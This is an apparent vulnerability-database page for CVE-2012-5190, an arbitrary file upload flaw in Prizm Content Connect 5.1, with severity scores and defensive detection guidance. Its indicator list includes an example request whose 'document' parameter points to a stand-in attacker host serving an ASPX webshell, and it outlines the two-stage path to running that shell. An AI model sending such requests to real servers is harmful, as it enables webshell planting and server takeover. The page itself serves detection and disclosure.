cbcvebase.
CVE-2012-5190
published 2020-01-21

CVE-2012-5190: Prizm Content Connect 5.1 has an Arbitrary File Upload Vulnerability

PriorityP266critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
4.65%
90.6th percentile
Prizm Content Connect 5.1 has an Arbitrary File Upload Vulnerability

Affected

1 ranges
VendorProductVersion rangeFixed in
accusoftprizm_content_connect

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://www.example.com/default.aspx?document=http://attacker.example.org/aspxshell.aspx
filenameaspxshell.aspx
pathC:\tempcache\
  • Monitor HTTP requests to default.aspx containing a remote URL in the 'document' parameter, which is the attack vector used to trigger remote file download/upload.
  • The application discloses the full path and randomly-named .aspx file dropped to the web root (e.g. C:\Project\ajwyfw45itxwys45fgzomrmv.aspx); alert on responses containing 'Full Document Path:' with a .aspx extension.
  • After the upload, the attacker directly requests the dropped ASPX webshell from the web root; monitor for GET requests to randomly-named .aspx files in the root that were not previously present.
  • Uploaded/downloaded files are staged in C:\tempcache\ before being placed in the web root; monitor this directory for unexpected .aspx files.
  • ·The vulnerable parameter is 'document' in default.aspx, which accepts a remote URL and causes the server to fetch and store the file — this is the exploitable SSRF/upload primitive.
  • ·The application reveals the full server-side path and filename of the downloaded file in the HTTP response body ('Document Location', 'Full Document Path', 'Temp Location'), enabling a two-stage exploit.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.